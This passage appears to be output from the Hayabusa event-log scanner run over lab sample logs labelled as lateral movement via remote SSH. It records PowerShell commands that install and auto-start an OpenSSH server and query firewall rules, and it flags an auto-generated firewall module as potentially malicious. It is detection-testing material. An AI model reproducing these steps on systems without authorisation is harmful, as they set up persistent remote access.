value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.455 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-WindowsCapability): ""Add-WindowsCapability"" ParameterBinding(Add-WindowsCapability): name=""Online""; value=""True"" ParameterBinding(Add-WindowsCapability): name=""Name""; value=""OpenSSH.Server~~~~0.0.1.0""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.455 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Microsoft.Dism.Commands.ImageObject""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.478 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:16.480 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Write-Host 'Final result: 1';,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""Final result: 1""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.663 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:04:37.671 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,$global:?,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 10:19:29.476 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:29.479 +00:00,win10-02.offsec.lan,4104,info,,PwSh 
Scriptblock Log,Start-Service sshd,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.035 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-Service): ""Start-Service"" ParameterBinding(Start-Service): name=""Name""; value=""sshd""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.036 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.039 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:30.041 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.548 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.559 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Service -Name sshd -StartupType 'Automatic',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.590 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Service): ""Set-Service"" ParameterBinding(Set-Service): name=""Name""; value=""sshd"" ParameterBinding(Set-Service): name=""StartupType""; value=""Automatic""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.590 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.593 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:32.595 
+00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:36.172 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:36.183 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallRule -Name *ssh*,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] 
${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, 
[Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.904 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,= 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = 
